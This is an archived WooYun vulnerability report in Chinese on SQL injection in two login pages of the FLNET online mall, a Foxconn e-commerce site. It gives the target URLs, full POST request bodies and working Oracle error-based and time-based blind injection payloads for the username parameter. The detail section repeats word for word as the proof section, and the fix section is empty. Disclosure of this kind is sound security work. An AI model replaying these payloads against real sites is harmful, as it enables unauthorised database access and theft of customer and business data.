当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113870

漏洞标题:深圳市富连网在线商城两处重要系统注入漏洞(3620张数据表)

相关厂商:深圳市富连网电子商务有限公司

漏洞作者: 路人甲

提交时间:2015-05-13 16:36

修复时间:2015-06-27 16:38

公开时间:2015-06-27 16:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

富连网位于广东深圳,是富士康集团在2014年启动的集团战略项目,将引领富士康集团由工、技向e贸转型的方向,将承载和整合富士康集团的领先的技术、研发、设计、生产制造的能力,直接面对消费者,全力打造一个集合在线上线下,面向全球的科技销售服务平台。富连网于2014年10月1 日正式上线,产品包括:手机、摄影、数码,电脑、平板、硬件,网络设备、办公设备、大家电等品类 。
2015年4月,富士康和苹果合作开始了官方二手机回收和销售业务,富连网成为正式授权销售渠道

详细说明:

问题厂商:http://www.flnet.com/
漏洞链接#1:

http://logistics.flnet.com/login.aspx


__EVENTTARGET=imgLogin&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjI0MzMzNzI2D2QWAgIBD2QWAgIJDw8WAh4EVGV4dAUMMTIwLjM1LjgxLjQ1ZGRkeAan8WVlPy10TsXRhv8DIt9jcrk%3D&txtUsername=111&txtPassword=111


txtUsername与txtPassWord参数存在注入;

Parameter: txtUsername
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=imgLogin&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMjI0MzMzNzI2D2QWAgIBD2QWAgIJDw8WAh4EVGV4dAUMMTIwLjM1LjgxLjQ1ZGRkeAan8WVlPy10TsXRhv8DIt9jcrk=&txtUsername=111' AND 3897=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(115)||CHR(119)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (3897=3897) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'arFy'='arFy&txtPassword=111
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: __EVENTTARGET=imgLogin&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMjI0MzMzNzI2D2QWAgIBD2QWAgIJDw8WAh4EVGV4dAUMMTIwLjM1LjgxLjQ1ZGRkeAan8WVlPy10TsXRhv8DIt9jcrk=&txtUsername=111' AND 7092=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'WaYI'='WaYI&txtPassword=111
---


3620张表,速度太慢了,就不演示了。

商城.png


-----------------------------------
#2:

http://wms.flnet.com/Login.aspx


__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExNjIxMTc4ODUPZBYCZg9kFgICAQ8PFgIeBFRleHQFCldNUyBTWVNURU1kZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIaW1nTG9naW4FCGltZ1Jlc2V0Qwocf%2F4M6f7g5vyrO1RB1zKatmY%3D&__EVENTVALIDATION=%2FwEWBwKo7LqZDAKl1bK4CQK1qbSRCwLmu%2FfTBQKgqv2eBwKLrazsBwKqqNjdA5mrGrcpp%2F%2FmeuXTy2XsBsHD3%2Fmw&txtUsername=admin&txtPassword=admin&imgLogin.x=26&imgLogin.y=12&hidUserIP=


商城2.png

漏洞证明:

问题厂商:http://www.flnet.com/
漏洞链接#1:

http://logistics.flnet.com/login.aspx


__EVENTTARGET=imgLogin&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjI0MzMzNzI2D2QWAgIBD2QWAgIJDw8WAh4EVGV4dAUMMTIwLjM1LjgxLjQ1ZGRkeAan8WVlPy10TsXRhv8DIt9jcrk%3D&txtUsername=111&txtPassword=111


txtUsername与txtPassWord参数存在注入;

Parameter: txtUsername
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=imgLogin&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMjI0MzMzNzI2D2QWAgIBD2QWAgIJDw8WAh4EVGV4dAUMMTIwLjM1LjgxLjQ1ZGRkeAan8WVlPy10TsXRhv8DIt9jcrk=&txtUsername=111' AND 3897=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(115)||CHR(119)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (3897=3897) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'arFy'='arFy&txtPassword=111
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: __EVENTTARGET=imgLogin&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMjI0MzMzNzI2D2QWAgIBD2QWAgIJDw8WAh4EVGV4dAUMMTIwLjM1LjgxLjQ1ZGRkeAan8WVlPy10TsXRhv8DIt9jcrk=&txtUsername=111' AND 7092=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'WaYI'='WaYI&txtPassword=111
---


3620张表,速度太慢了,就不演示了。

商城.png


-----------------------------------
#2:

http://wms.flnet.com/Login.aspx


__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExNjIxMTc4ODUPZBYCZg9kFgICAQ8PFgIeBFRleHQFCldNUyBTWVNURU1kZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIaW1nTG9naW4FCGltZ1Jlc2V0Qwocf%2F4M6f7g5vyrO1RB1zKatmY%3D&__EVENTVALIDATION=%2FwEWBwKo7LqZDAKl1bK4CQK1qbSRCwLmu%2FfTBQKgqv2eBwKLrazsBwKqqNjdA5mrGrcpp%2F%2FmeuXTy2XsBsHD3%2Fmw&txtUsername=admin&txtPassword=admin&imgLogin.x=26&imgLogin.y=12&hidUserIP=


商城2.png

修复方案:

。。。。。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝